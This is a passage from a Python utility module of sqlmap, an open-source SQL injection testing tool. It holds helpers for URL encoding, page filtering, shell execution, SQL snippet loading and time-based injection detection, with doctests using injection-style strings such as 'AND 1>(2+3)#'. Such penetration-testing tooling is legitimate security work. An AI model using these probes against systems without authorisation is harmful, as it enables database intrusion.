parts[i]:\n                        parts[i] = parts[i].replace(PAYLOAD_DELIMITER, \"\")\n                        parts[i] = \"%s%s\" % (parts[i], PAYLOAD_DELIMITER)\n                        break\n                format_ = ' '.join(parts)\n\n            count = 0\n            while True:\n                match = re.search(r\"(\\A|[^A-Za-z0-9])(%s)([^A-Za-z0-9]|\\Z)\", retVal)\n                if match:\n                    if count >= len(params):\n                        warnMsg = \"wrong number of parameters during string formatting. \"\n                        warnMsg += \"Please report by e-mail content \\\"%r | %r | %r\\\" to '%s'\" % (format_, params, retVal, DEV_EMAIL_ADDRESS)\n                        raise SqlmapValueException(warnMsg)\n                    else:\n                        try:\n                            retVal = re.sub(r\"(\\A|[^A-Za-z0-9])(%s)([^A-Za-z0-9]|\\Z)\", r\"\\g<1>%s\\g<3>\" % params[count], retVal, 1)\n                        except re.error:\n                            retVal = retVal.replace(match.group(0), match.group(0) % params[count], 1)\n                        count += 1\n                else:\n                    break\n\n    retVal = getText(retVal).replace(PARAMETER_PERCENTAGE_MARKER, '%')\n\n    return retVal\n\ndef getFilteredPageContent(page, onlyText=True, split=\" \"):\n    \"\"\"\n    Returns filtered page content without script, style and/or comments\n    or all HTML tags\n\n    >>> getFilteredPageContent(u'<html><title>foobar</title><body>test</body></html>') == \"foobar test\"\n    True\n    \"\"\"\n\n    retVal = page\n\n    # only if the page's charset has been successfully identified\n    if isinstance(page, six.text_type):\n        retVal = re.sub(r\"(?si)<script.+?</script>|<!--.+?-->|<style.+?</style>%s\" % (r\"|<[^>]+>|\\t|\\n|\\r\" if onlyText else \"\"), split, page)\n        retVal = re.sub(r\"%s{2,}\" % split, split, retVal)\n        retVal = htmlUnescape(retVal.strip().strip(split))\n\n    return retVal\n\ndef getPageWordSet(page):\n    \"\"\"\n    Returns word set used in page content\n\n    >>> sorted(getPageWordSet(u'<html><title>foobar</title><body>test</body></html>')) == [u'foobar', u'test']\n    True\n    \"\"\"\n\n    retVal = set()\n\n    # only if the page's charset has been successfully identified\n    if isinstance(page, six.string_types):\n        retVal = set(_.group(0) for _ in re.finditer(r\"\\w+\", getFilteredPageContent(page)))\n\n    return retVal\n\ndef showStaticWords(firstPage, secondPage, minLength=3):\n    \"\"\"\n    Prints words appearing in two different response pages\n\n    >>> showStaticWords(\"this is a test\", \"this is another test\")\n    ['this']\n    \"\"\"\n\n    infoMsg = \"finding static words in longest matching part of dynamic page content\"\n    logger.info(infoMsg)\n\n    firstPage = getFilteredPageContent(firstPage)\n    secondPage = getFilteredPageContent(secondPage)\n\n    infoMsg = \"static words: \"\n\n    if firstPage and secondPage:\n        match = SequenceMatcher(None, firstPage, secondPage).find_longest_match(0, len(firstPage), 0, len(secondPage))\n        commonText = firstPage[match[0]:match[0] + match[2]]\n        commonWords = getPageWordSet(commonText)\n    else:\n        commonWords = None\n\n    if commonWords:\n        commonWords = [_ for _ in commonWords if len(_) >= minLength]\n        commonWords.sort(key=functools.cmp_to_key(lambda a, b: cmp(a.lower(), b.lower())))\n\n        for word in commonWords:\n            infoMsg += \"'%s', \" % word\n\n        infoMsg = infoMsg.rstrip(\", \")\n    else:\n        infoMsg += \"None\"\n\n    logger.info(infoMsg)\n\n    return commonWords\n\ndef isWindowsDriveLetterPath(filepath):\n    \"\"\"\n    Returns True if given filepath starts with a Windows drive letter\n\n    >>> isWindowsDriveLetterPath('C:\\\\boot.ini')\n    True\n    >>> isWindowsDriveLetterPath('/var/log/apache.log')\n    False\n    \"\"\"\n\n    return re.search(r\"\\A[\\w]\\:\", filepath) is not None\n\ndef posixToNtSlashes(filepath):\n    \"\"\"\n    Replaces all occurrences of Posix slashes in provided\n    filepath with NT backslashes\n\n    >>> posixToNtSlashes('C:/Windows')\n    'C:\\\\\\\\Windows'\n    \"\"\"\n\n    return filepath.replace('/', '\\\\') if filepath else filepath\n\ndef ntToPosixSlashes(filepath):\n    \"\"\"\n    Replaces all occurrences of NT backslashes in provided\n    filepath with Posix slashes\n\n    >>> ntToPosixSlashes('C:\\\\Windows')\n    'C:/Windows'\n    \"\"\"\n\n    return filepath.replace('\\\\', '/') if filepath else filepath\n\ndef isHexEncodedString(subject):\n    \"\"\"\n    Checks if the provided string is hex encoded\n\n    >>> isHexEncodedString('DEADBEEF')\n    True\n    >>> isHexEncodedString('test')\n    False\n    \"\"\"\n\n    return re.match(r\"\\A[0-9a-fA-Fx]+\\Z\", subject) is not None\n\n@cachedmethod\ndef getConsoleWidth(default=80):\n    \"\"\"\n    Returns console width\n\n    >>> any((getConsoleWidth(), True))\n    True\n    \"\"\"\n\n    width = None\n\n    if os.getenv(\"COLUMNS\", \"\").isdigit():\n        width = int(os.getenv(\"COLUMNS\"))\n    else:\n        try:\n            output = shellExec(\"stty size\")\n            match = re.search(r\"\\A\\d+ (\\d+)\", output)\n\n            if match:\n                width = int(match.group(1))\n        except (OSError, MemoryError):\n            pass\n\n    if width is None:\n        try:\n            import curses\n\n            stdscr = curses.initscr()\n            _, width = stdscr.getmaxyx()\n            curses.endwin()\n        except:\n            pass\n\n    return width or default\n\ndef shellExec(cmd):\n    \"\"\"\n    Executes arbitrary shell command\n\n    >>> shellExec('echo 1').strip() == '1'\n    True\n    \"\"\"\n\n    retVal = \"\"\n\n    try:\n        retVal = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT).communicate()[0] or \"\"\n    except Exception as ex:\n        retVal = getSafeExString(ex)\n    finally:\n        retVal = getText(retVal)\n\n    return retVal\n\ndef clearConsoleLine(forceOutput=False):\n    \"\"\"\n    Clears current console line\n    \"\"\"\n\n    if IS_TTY:\n        dataToStdout(\"\\r%s\\r\" % (\" \" * (getConsoleWidth() - 1)), forceOutput)\n\n    kb.prependFlag = False\n\ndef parseXmlFile(xmlFile, handler):\n    \"\"\"\n    Parses XML file by a given handler\n    \"\"\"\n\n    try:\n        with contextlib.closing(io.StringIO(readCachedFileContent(xmlFile))) as stream:\n            parse(stream, handler)\n    except (SAXParseException, UnicodeError) as ex:\n        errMsg = \"something appears to be wrong with \"\n        errMsg += \"the file '%s' ('%s'). Please make \" % (xmlFile, getSafeExString(ex))\n        errMsg += \"sure that you haven't made any changes to it\"\n        raise SqlmapInstallationException(errMsg)\n\ndef getSQLSnippet(dbms, sfile, **variables):\n    \"\"\"\n    Returns content of SQL snippet located inside 'procs/' directory\n\n    >>> 'RECONFIGURE' in getSQLSnippet(DBMS.MSSQL, \"activate_sp_oacreate\")\n    True\n    \"\"\"\n\n    if sfile.endswith('.sql') and os.path.exists(sfile):\n        filename = sfile\n    elif not sfile.endswith('.sql') and os.path.exists(\"%s.sql\" % sfile):\n        filename = \"%s.sql\" % sfile\n    else:\n        filename = os.path.join(paths.SQLMAP_PROCS_PATH, DBMS_DIRECTORY_DICT[dbms], sfile if sfile.endswith('.sql') else \"%s.sql\" % sfile)\n        checkFile(filename)\n\n    retVal = readCachedFileContent(filename)\n    retVal = re.sub(r\"#.+\", \"\", retVal)\n    retVal = re.sub(r\";\\s+\", \"; \", retVal).strip(\"\\r\\n\")\n\n    for _ in variables:\n        retVal = re.sub(r\"%%%s%%\" % _, variables[_].replace('\\\\', r'\\\\'), retVal)\n\n    for _ in re.findall(r\"%RANDSTR\\d+%\", retVal, re.I):\n        retVal = retVal.replace(_, randomStr())\n\n    for _ in re.findall(r\"%RANDINT\\d+%\", retVal, re.I):\n        retVal = retVal.replace(_, randomInt())\n\n    variables = re.findall(r\"(?<!\\bLIKE ')%(\\w+)%\", retVal, re.I)\n\n    if variables:\n        errMsg = \"unresolved variable%s '%s' in SQL file '%s'\" % (\"s\" if len(variables) > 1 else \"\", \", \".join(variables), sfile)\n        logger.error(errMsg)\n\n        msg = \"do you want to provide the substitution values? [y/N] \"\n\n        if readInput(msg, default='N', boolean=True):\n            for var in variables:\n                msg = \"insert value for variable '%s': \" % var\n                val = readInput(msg, default=\"\")\n                retVal = retVal.replace(r\"%%%s%%\" % var, val)\n\n    return retVal\n\ndef readCachedFileContent(filename, mode=\"rb\"):\n    \"\"\"\n    Cached reading of file content (avoiding multiple same file reading)\n\n    >>> \"readCachedFileContent\" in readCachedFileContent(__file__)\n    True\n    \"\"\"\n\n    if filename not in kb.cache.content:\n        with kb.locks.cache:\n            if filename not in kb.cache.content:\n                checkFile(filename)\n                try:\n                    with openFile(filename, mode) as f:\n                        kb.cache.content[filename] = f.read()\n                except (IOError, OSError, MemoryError) as ex:\n                    errMsg = \"something went wrong while trying \"\n                    errMsg += \"to read the content of file '%s' ('%s')\" % (filename, getSafeExString(ex))\n                    raise SqlmapSystemException(errMsg)\n\n    return kb.cache.content[filename]\n\ndef average(values):\n    \"\"\"\n    Computes the arithmetic mean of a list of numbers.\n\n    >>> \"%.1f\" % average([0.9, 0.9, 0.9, 1.0, 0.8, 0.9])\n    '0.9'\n    \"\"\"\n\n    return (1.0 * sum(values) / len(values)) if values else None\n\n@cachedmethod\ndef stdev(values):\n    \"\"\"\n    Computes standard deviation of a list of numbers.\n\n    # Reference: http://www.goldb.org/corestats.html\n\n    >>> \"%.3f\" % stdev([0.9, 0.9, 0.9, 1.0, 0.8, 0.9])\n    '0.063'\n    \"\"\"\n\n    if not values or len(values) < 2:\n        return None\n    else:\n        avg = average(values)\n        _ = 1.0 * sum(pow((_ or 0) - avg, 2) for _ in values)\n        return sqrt(_ / (len(values) - 1))\n\ndef calculateDeltaSeconds(start):\n    \"\"\"\n    Returns elapsed time from start till now\n\n    >>> calculateDeltaSeconds(0) > 1151721660\n    True\n    \"\"\"\n\n    return time.time() - start\n\ndef initCommonOutputs():\n    \"\"\"\n    Initializes dictionary containing common output values used by \"good samaritan\" feature\n\n    >>> initCommonOutputs(); \"information_schema\" in kb.commonOutputs[\"Databases\"]\n    True\n    \"\"\"\n\n    kb.commonOutputs = {}\n    key = None\n\n    for line in openFile(paths.COMMON_OUTPUTS, 'r'):\n        if line.find('#') != -1:\n            line = line[:line.find('#')]\n\n        line = line.strip()\n\n        if len(line) > 1:\n            if line.startswith('[') and line.endswith(']'):\n                key = line[1:-1]\n            elif key:\n                if key not in kb.commonOutputs:\n                    kb.commonOutputs[key] = set()\n\n                if line not in kb.commonOutputs[key]:\n                    kb.commonOutputs[key].add(line)\n\ndef getFileItems(filename, commentPrefix='#', unicoded=True, lowercase=False, unique=False):\n    \"\"\"\n    Returns newline delimited items contained inside file\n\n    >>> \"SELECT\" in getFileItems(paths.SQL_KEYWORDS)\n    True\n    \"\"\"\n\n    retVal = list() if not unique else OrderedDict()\n\n    if filename:\n        filename = filename.strip('\"\\'')\n\n    checkFile(filename)\n\n    try:\n        with openFile(filename, 'r', errors=\"ignore\") if unicoded else open(filename, 'r') as f:\n            for line in f:\n                if commentPrefix:\n                    if line.find(commentPrefix) != -1:\n                        line = line[:line.find(commentPrefix)]\n\n                line = line.strip()\n\n                if line:\n                    if lowercase:\n                        line = line.lower()\n\n                    if unique and line in retVal:\n                        continue\n\n                    if unique:\n                        retVal[line] = True\n                    else:\n                        retVal.append(line)\n    except (IOError, OSError, MemoryError) as ex:\n        errMsg = \"something went wrong while trying \"\n        errMsg += \"to read the content of file '%s' ('%s')\" % (filename, getSafeExString(ex))\n        raise SqlmapSystemException(errMsg)\n\n    return retVal if not unique else list(retVal.keys())\n\ndef goGoodSamaritan(prevValue, originalCharset):\n    \"\"\"\n    Function for retrieving parameters needed for common prediction (good\n    samaritan) feature.\n\n    prevValue: retrieved query output so far (e.g. 'i').\n\n    Returns commonValue if there is a complete single match (in kb.partRun\n    of txt/common-outputs.txt under kb.partRun) regarding parameter\n    prevValue. If there is no single value match, but multiple, commonCharset is\n    returned containing more probable characters (retrieved from matched\n    values in txt/common-outputs.txt) together with the rest of charset as\n    otherCharset.\n    \"\"\"\n\n    if kb.commonOutputs is None:\n        initCommonOutputs()\n\n    predictionSet = set()\n    commonValue = None\n    commonPattern = None\n    countCommonValue = 0\n\n    # If the header (e.g. Databases) we are looking for has common\n    # outputs defined\n    if kb.partRun in kb.commonOutputs:\n        commonPartOutputs = kb.commonOutputs[kb.partRun]\n        commonPattern = commonFinderOnly(prevValue, commonPartOutputs)\n\n        # If the longest common prefix is the same as previous value then\n        # do not consider it\n        if commonPattern and commonPattern == prevValue:\n            commonPattern = None\n\n        # For each common output\n        for item in commonPartOutputs:\n            # Check if the common output (item) starts with prevValue\n            # where prevValue is the enumerated character(s) so far\n            if item.startswith(prevValue):\n                commonValue = item\n                countCommonValue += 1\n\n                if len(item) > len(prevValue):\n                    char = item[len(prevValue)]\n                    predictionSet.add(char)\n\n        # Reset single value if there is more than one possible common\n        # output\n        if countCommonValue > 1:\n            commonValue = None\n\n        commonCharset = []\n        otherCharset = []\n\n        # Split the original charset into common chars (commonCharset)\n        # and other chars (otherCharset)\n        for ordChar in originalCharset:\n            if _unichr(ordChar) not in predictionSet:\n                otherCharset.append(ordChar)\n            else:\n                commonCharset.append(ordChar)\n\n        commonCharset.sort()\n\n        return commonValue, commonPattern, commonCharset, originalCharset\n    else:\n        return None, None, None, originalCharset\n\ndef getPartRun(alias=True):\n    \"\"\"\n    Goes through call stack and finds constructs matching\n    conf.dbmsHandler.*. Returns it or its alias used in 'txt/common-outputs.txt'\n    \"\"\"\n\n    retVal = None\n    commonPartsDict = optDict[\"Enumeration\"]\n\n    try:\n        stack = [item[4][0] if isinstance(item[4], list) else '' for item in inspect.stack()]\n\n        # Goes backwards through the stack to find the conf.dbmsHandler method\n        # calling this function\n        for i in xrange(0, len(stack) - 1):\n            for regex in (r\"self\\.(get[^(]+)\\(\\)\", r\"conf\\.dbmsHandler\\.([^(]+)\\(\\)\"):\n                match = re.search(regex, stack[i])\n\n                if match:\n                    # This is the calling conf.dbmsHandler or self method\n                    # (e.g. 'getDbms')\n                    retVal = match.groups()[0]\n                    break\n\n            if retVal is not None:\n                break\n\n    # Reference: http://coding.derkeiler.com/Archive/Python/comp.lang.python/2004-06/2267.html\n    except TypeError:\n        pass\n\n    # Return the INI tag to consider for common outputs (e.g. 'Databases')\n    if alias:\n        return commonPartsDict[retVal][1] if isinstance(commonPartsDict.get(retVal), tuple) else retVal\n    else:\n        return retVal\n\ndef longestCommonPrefix(*sequences):\n    \"\"\"\n    Returns longest common prefix occuring in given sequences\n\n    # Reference: http://boredzo.org/blog/archives/2007-01-06/longest-common-prefix-in-python-2\n\n    >>> longestCommonPrefix('foobar', 'fobar')\n    'fo'\n    \"\"\"\n\n    if len(sequences) == 1:\n        return sequences[0]\n\n    sequences = [pair[1] for pair in sorted((len(fi), fi) for fi in sequences)]\n\n    if not sequences:\n        return None\n\n    for i, comparison_ch in enumerate(sequences[0]):\n        for fi in sequences[1:]:\n            ch = fi[i]\n\n            if ch != comparison_ch:\n                return fi[:i]\n\n    return sequences[0]\n\ndef commonFinderOnly(initial, sequence):\n    \"\"\"\n    Returns parts of sequence which start with the given initial string\n\n    >>> commonFinderOnly(\"abcd\", [\"abcdefg\", \"foobar\", \"abcde\"])\n    'abcde'\n    \"\"\"\n\n    return longestCommonPrefix(*[_ for _ in sequence if _.startswith(initial)])\n\ndef pushValue(value):\n    \"\"\"\n    Push value to the stack (thread dependent)\n    \"\"\"\n\n    exception = None\n    success = False\n\n    for i in xrange(PUSH_VALUE_EXCEPTION_RETRY_COUNT):\n        try:\n            getCurrentThreadData().valueStack.append(copy.deepcopy(value))\n            success = True\n            break\n        except Exception as ex:\n            exception = ex\n\n    if not success:\n        getCurrentThreadData().valueStack.append(None)\n\n        if exception:\n            raise exception\n\ndef popValue():\n    \"\"\"\n    Pop value from the stack (thread dependent)\n\n    >>> pushValue('foobar')\n    >>> popValue()\n    'foobar'\n    \"\"\"\n\n    retVal = None\n\n    try:\n        retVal = getCurrentThreadData().valueStack.pop()\n    except IndexError:\n        pass\n\n    return retVal\n\ndef wasLastResponseDBMSError():\n    \"\"\"\n    Returns True if the last web request resulted in a (recognized) DBMS error page\n    \"\"\"\n\n    threadData = getCurrentThreadData()\n    return threadData.lastErrorPage and threadData.lastErrorPage[0] == threadData.lastRequestUID\n\ndef wasLastResponseHTTPError():\n    \"\"\"\n    Returns True if the last web request resulted in an erroneous HTTP code (like 500)\n    \"\"\"\n\n    threadData = getCurrentThreadData()\n    return threadData.lastHTTPError and threadData.lastHTTPError[0] == threadData.lastRequestUID\n\ndef wasLastResponseDelayed():\n    \"\"\"\n    Returns True if the last web request resulted in a time-delay\n    \"\"\"\n\n    # 99.9999999997440% of all non time-based SQL injection affected\n    # response times should be inside +-7*stdev([normal response times])\n    # Math reference: http://www.answers.com/topic/standard-deviation\n\n    deviation = stdev(kb.responseTimes.get(kb.responseTimeMode, []))\n    threadData = getCurrentThreadData()\n\n    if deviation and not conf.direct and not conf.disableStats:\n        if len(kb.responseTimes[kb.responseTimeMode]) < MIN_TIME_RESPONSES:\n            warnMsg = \"time-based standard deviation method used on a model \"\n            warnMsg += \"with less than %d response times\" % MIN_TIME_RESPONSES\n            logger.warning(warnMsg)\n\n        lowerStdLimit = average(kb.responseTimes[kb.responseTimeMode]) + TIME_STDEV_COEFF * deviation\n        retVal = (threadData.lastQueryDuration >= max(MIN_VALID_DELAYED_RESPONSE, lowerStdLimit))\n\n        if not kb.testMode and retVal:\n            if kb.adjustTimeDelay is None:\n                msg = \"do you want sqlmap to try to optimize value(s) \"\n                msg += \"for DBMS delay responses (option '--time-sec')? [Y/n] \"\n\n                kb.adjustTimeDelay = ADJUST_TIME_DELAY.DISABLE if not readInput(msg, default='Y', boolean=True) else ADJUST_TIME_DELAY.YES\n            if kb.adjustTimeDelay is ADJUST_TIME_DELAY.YES:\n                adjustTimeDelay(threadData.lastQueryDuration, lowerStdLimit)\n\n        return retVal\n    else:\n        delta = threadData.lastQueryDuration - conf.timeSec\n        if Backend.getIdentifiedDbms() in (DBMS.MYSQL,):  # MySQL's SLEEP(X) lasts 0.05 seconds shorter on average\n            delta += 0.05\n        return delta >= 0\n\ndef adjustTimeDelay(lastQueryDuration, lowerStdLimit):\n    \"\"\"\n    Provides tip for adjusting time delay in time-based data retrieval\n    \"\"\"\n\n    candidate = (1 if not isHeavyQueryBased() else 2) + int(round(lowerStdLimit))\n\n    kb.delayCandidates = [candidate] + kb.delayCandidates[:-1]\n\n    if all((_ == candidate for _ in kb.delayCandidates)) and candidate < conf.timeSec:\n        if lastQueryDuration / (1.0 * conf.timeSec / candidate) > MIN_VALID_DELAYED_RESPONSE:  # Note: to prevent problems with fast responses for heavy-queries like RANDOMBLOB\n            conf.timeSec = candidate\n\n            infoMsg = \"adjusting time delay to \"\n            infoMsg += \"%d second%s due to good response times\" % (conf.timeSec, 's' if conf.timeSec > 1 else '')\n            logger.info(infoMsg)\n\ndef getLastRequestHTTPError():\n    \"\"\"\n    Returns last HTTP error code\n    \"\"\"\n\n    threadData = getCurrentThreadData()\n    return threadData.lastHTTPError[1] if threadData.lastHTTPError else None\n\ndef extractErrorMessage(page):\n    \"\"\"\n    Returns reported error message from page if it founds one\n\n    >>> getText(extractErrorMessage(u'<html><title>Test</title>\\\\n<b>Warning</b>: oci_parse() [function.oci-parse]: ORA-01756: quoted string not properly terminated<br><p>Only a test page</p></html>') )\n    'oci_parse() [function.oci-parse]: ORA-01756: quoted string not properly terminated'\n    >>> extractErrorMessage('Warning: This is only a dummy foobar test') is None\n    True\n    \"\"\"\n\n    retVal = None\n\n    if isinstance(page, six.string_types):\n        if wasLastResponseDBMSError():\n            page = re.sub(r\"<[^>]+>\", \"\", page)\n\n        for regex in ERROR_PARSING_REGEXES:\n            match = re.search(regex, page, re.IGNORECASE)\n\n            if match:\n                candidate = htmlUnescape(match.group(\"result\")).replace(\"<br>\", \"\\n\").strip()\n                if candidate and (1.0 * len(re.findall(r\"[^A-Za-z,. ]\", candidate)) / len(candidate) > MIN_ERROR_PARSING_NON_WRITING_RATIO):\n                    retVal = candidate\n                    break\n\n        if not retVal and wasLastResponseDBMSError():\n            match = re.search(r\"[^\\n]*SQL[^\\n:]*:[^\\n]*\", page, re.IGNORECASE)\n\n            if match:\n                retVal = match.group(0)\n\n    return retVal\n\ndef findLocalPort(ports):\n    \"\"\"\n    Find the first opened localhost port from a given list of ports (e.g. for Tor port checks)\n    \"\"\"\n\n    retVal = None\n\n    for port in ports:\n        try:\n            try:\n                s = socket._orig_socket(socket.AF_INET, socket.SOCK_STREAM)\n            except AttributeError:\n                s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n            s.connect((LOCALHOST, port))\n            retVal = port\n            break\n        except socket.error:\n            pass\n        finally:\n            try:\n                s.close()\n            except socket.error:\n                pass\n\n    return retVal\n\ndef findMultipartPostBoundary(post):\n    \"\"\"\n    Finds value for a boundary parameter in given multipart POST body\n\n    >>> findMultipartPostBoundary(\"-----------------------------9051914041544843365972754266\\\\nContent-Disposition: form-data; name=text\\\\n\\\\ndefault\")\n    '9051914041544843365972754266'\n    \"\"\"\n\n    retVal = None\n\n    done = set()\n    candidates = []\n\n    for match in re.finditer(r\"(?m)^--(.+?)(--)?$\", post or \"\"):\n        _ = match.group(1).strip().strip('-')\n\n        if _ in done:\n            continue\n        else:\n            candidates.append((post.count(_), _))\n            done.add(_)\n\n    if candidates:\n        candidates.sort(key=lambda _: _[0], reverse=True)\n        retVal = candidates[0][1]\n\n    return retVal\n\ndef urldecode(value, encoding=None, unsafe=\"%%?&=;+%s\" % CUSTOM_INJECTION_MARK_CHAR, convall=False, spaceplus=True):\n    \"\"\"\n    URL decodes given value\n\n    >>> urldecode('AND%201%3E%282%2B3%29%23', convall=True) == 'AND 1>(2+3)#'\n    True\n    >>> urldecode('AND%201%3E%282%2B3%29%23', convall=False) == 'AND 1>(2%2B3)#'\n    True\n    >>> urldecode(b'AND%201%3E%282%2B3%29%23', convall=False) == 'AND 1>(2%2B3)#'\n    True\n    \"\"\"\n\n    result = value\n\n    if value:\n        value = getUnicode(value)\n\n        if convall:\n            result = _urllib.parse.unquote_plus(value) if spaceplus else _urllib.parse.unquote(value)\n        else:\n            result = value\n            charset = set(string.printable) - set(unsafe)\n\n            def _(match):\n                char = decodeHex(match.group(1), binary=False)\n                return char if char in charset else match.group(0)\n\n            if spaceplus:\n                result = result.replace('+', ' ')  # plus sign has a special meaning in URL encoded data (hence the usage of _urllib.parse.unquote_plus in convall case)\n\n            result = re.sub(r\"%([0-9a-fA-F]{2})\", _, result or \"\")\n\n        result = getUnicode(result, encoding or UNICODE_ENCODING)\n\n    return result\n\ndef urlencode(value, safe=\"%&=-_\", convall=False, limit=False, spaceplus=False):\n    \"\"\"\n    URL encodes given value\n\n    >>> urlencode('AND 1>(2+3)#')\n    'AND%201%3E%282%2B3%29%23'\n    >>> urlencode(\"AND COUNT(SELECT name FROM users WHERE name LIKE '%DBA%')>0\")\n    'AND%20COUNT%28SELECT%20name%20FROM%20users%20WHERE%20name%20LIKE%20%27%25DBA%25%27%29%3E0'\n    >>> urlencode(\"AND COUNT(SELECT name FROM users WHERE name LIKE '%_SYSTEM%')>0\")\n    'AND%20COUNT%28SELECT%20name%20FROM%20users%20WHERE%20name%20LIKE%20%27%25_SYSTEM%25%27%29%3E0'\n    >>> urlencode(\"SELECT NAME FROM TABLE WHERE VALUE LIKE '%SOME%BEGIN%'\")\n    'SELECT%20NAME%20FROM%20TABLE%20WHERE%20VALUE%20LIKE%20%27%25SOME%25BEGIN%25%27'\n    \"\"\"\n\n    if conf.get(\"direct\"):\n        return value\n\n    count = 0\n    result = None if value is None else \"\"\n\n    if value:\n        value = re.sub(r\"\\b[$\\w]+=\", lambda match: match.group(0).replace('$', DOLLAR_MARKER), value)\n\n        if Backend.isDbms(DBMS.MSSQL) and not kb.tamperFunctions and any(ord(_) > 255 for _ in value):\n            warnMsg = \"if you experience problems with \"\n            warnMsg += \"non-ASCII identifier names \"\n            warnMsg += \"you are advised to rerun with '--tamper=charunicodeencode'\"\n            singleTimeWarnMessage(warnMsg)\n\n        if convall or safe is None:\n            safe = \"\"\n\n        # corner case when character % really needs to be\n        # encoded (when not representing URL encoded char)\n        # except in cases when tampering scripts are used\n        if all('%' in _ for _ in (safe, value)) and not kb.tamperFunctions:\n            value = re.sub(r\"(?i)\\bLIKE\\s+'[^']+'\", lambda match: match.group(0).replace('%', \"%25\"), value)\n            value = re.sub(r\"%(?![0-9a-fA-F]{2})\", \"%25\", value)\n\n        while True:\n            result = _urllib.parse.quote(getBytes(value), safe)\n\n            if limit and len(result) > URLENCODE_CHAR_LIMIT:\n                if count >= len(URLENCODE_FAILSAFE_CHARS):\n                    break\n\n                while count < len(URLENCODE_FAILSAFE_CHARS):\n                    safe += URLENCODE_FAILSAFE_CHARS[count]\n                    count += 1\n                    if safe[-1] in value:\n                        break\n            else:\n                break\n\n        if spaceplus:\n            result = result.replace(_urllib.parse.quote(' '), '+')\n\n        result = result.replace(DOLLAR_MARKER, '$')\n\n    return result\n\ndef runningAsAdmin():\n    \"\"\"\n    Returns True if the current process is run under admin privileges\n    \"\"\"\n\n    isAdmin = None\n\n    if PLATFORM in (\"posix\", \"mac\"):\n        _ = os.geteuid()\n\n        isAdmin = isinstance(_, (float, six.integer_types)) and _ == 0\n    elif IS_WIN:\n        import ctypes\n\n        _ = ctypes.windll.shell32.IsUserAnAdmin()\n\n        isAdmin = isinstance(_, (float, six.integer_types)) and _ == 1\n    else:\n        errMsg = \"sqlmap is not able to check if you are running it \"\n        errMsg += \"as an administrator account on this platform. \"\n        errMsg += \"sqlmap will assume that you are an administrator \"\n        errMsg += \"which is mandatory for the requested takeover attack \"\n        errMsg += \"to work properly\"\n        logger.error(errMsg)\n\n        isAdmin = True\n\n    return isAdmin\n\ndef logHTTPTraffic(requestLogMsg, responseLogMsg, startTime=None, endTime=None):\n    \"\"\"\n    Logs HTTP traffic to the output file\n    \"\"\"\n\n    if conf.harFile:\n        conf.httpCollector.collectRequest(requestLogMsg, responseLogMsg, startTime, endTime)\n\n    if conf.trafficFile:\n        with kb.locks.log:\n            dataToTrafficFile(\"%s%s\" % (requestLogMsg, os.linesep))\n            dataToTrafficFile(\"%s%s\" % (responseLogMsg, os.linesep))\n            dataToTrafficFile(\"%s%s%s%s\" % (os.linesep, 76 * '#', os.linesep, os.linesep))\n\ndef getPageTemplate(payload, place):  # Cross-referenced function\n    raise NotImplementedError\n\n@cachedmethod\ndef getPublicTypeMembers(type_, onlyValues=False):\n    \"\"\"\n    Useful for getting members from types (e.g. in enums)\n\n    >>> [_ for _ in getPublicTypeMembers(OS, True)]\n    ['Linux', 'Windows']\n    >>> [_ for _ in getPublicTypeMembers(PAYLOAD.TECHNIQUE, True)]\n    [1, 2, 3, 4, 5, 6]\n    \"\"\"\n\n    retVal = []\n\n    for name, value in inspect.getmembers(type_):\n        if not name.startswith(\"__\"):\n            if not onlyValues:\n                retVal.append((name, value))\n            else:\n                retVal.append(value)\n\n    return retVal\n\ndef enumValueToNameLookup(type_, value_):\n    \"\"\"\n    Returns name of a enum member with a given value\n\n    >>> enumValueToNameLookup(SORT_ORDER, 100)\n    'LAST'\n    \"\"\"\n\n    retVal = None\n\n    for name, value in getPublicTypeMembers(type_):\n        if value == value_:\n            retVal = name\n            break\n\n    return retVal\n\n@cachedmethod\ndef extractRegexResult(regex, content, flags=0):\n    \"\"\"\n    Returns 'result' group value from a possible match with regex on a given\n    content\n\n    >>> extractRegexResult(r'a(?P<result>[^g]+)g', 'abcdefg')\n    'bcdef'\n    >>> extractRegexResult(r'a(?P<result>[^g]+)g', 'ABCDEFG', re.I)\n    'BCDEF'\n    \"\"\"\n\n    retVal = None\n\n    if regex and content and \"?P<result>\" in regex:\n        if isinstance(content, six.binary_type) and isinstance(regex, six.text_type):\n            regex = getBytes(regex)\n\n        match = re.search(regex, content, flags)\n\n        if match:\n            retVal = match.group(\"result\")\n\n    return retVal\n\ndef extractTextTagContent(page):\n    \"\"\"\n    Returns list containing content from \"textual\" tags\n\n    >>> extractTextTagContent('<html><head><title>Title</title></head><body><pre>foobar</pre><a href=\"#link\">Link</a></body></html>')\n    ['Title', 'foobar']\n    \"\"\"\n\n    page = page or \"\"\n\n    if REFLECTED_VALUE_MARKER in page:\n        try:\n            page = re.sub(r\"(?i)[^\\s>]*%s[^\\s<]*\" % REFLECTED_VALUE_MARKER, \"\", page)\n        except MemoryError:\n            page = page.replace(REFLECTED_VALUE_MARKER, \"\")\n\n    return filterNone(_.group(\"result\").strip() for _ in re.finditer(TEXT_TAG_REGEX, page))\n\ndef trimAlphaNum(value):\n    \"\"\"\n    Trims alpha numeric characters from start and ending of a given value\n\n    >>> trimAlphaNum('AND 1>(2+3)-- foobar')\n    ' 1>(2+3)-- '\n    \"\"\"\n\n    while value and value[-1].isalnum():\n        value = value[:-1]\n\n    while value and value[0].isalnum():\n        value = value[1:]\n\n    return value\n\ndef isNumPosStrValue(value):\n    \"\"\"\n    Returns True if value is a string (or integer) with a positive integer representation\n\n    >>> isNumPosStrValue(1)\n    True\n    >>> isNumPosStrValue('1')\n    True\n    >>> isNumPosStrValue(0)\n    False\n    >>> isNumPosStrValue('-2')\n    False\n    >>> isNumPosStrValue('100000000000000000000')\n    False\n    \"\"\"\n\n    return ((hasattr(value, \"isdigit\") and value.isdigit() and int(value) > 0) or (isinstance(value, int) and value > 0)) and int(value) < MAX_INT\n\n@cachedmethod\ndef aliasToDbmsEnum(dbms):\n    \"\"\"\n    Returns major DBMS name from a given alias\n\n    >>> aliasToDbmsEnum('mssql')\n    'Microsoft SQL Server'\n    \"\"\"\n\n    retVal = None\n\n    if dbms:\n        for key, item in DBMS_DICT.items():\n            if dbms.lower() in item[0] or dbms.lower() == key.lower():\n                retVal = key\n                break\n\n    return retVal\n\ndef findDynamicContent(firstPage, secondPage):\n    \"\"\"\n    This function checks if the provided pages have dynamic content. If they\n    are dynamic, proper markings will be 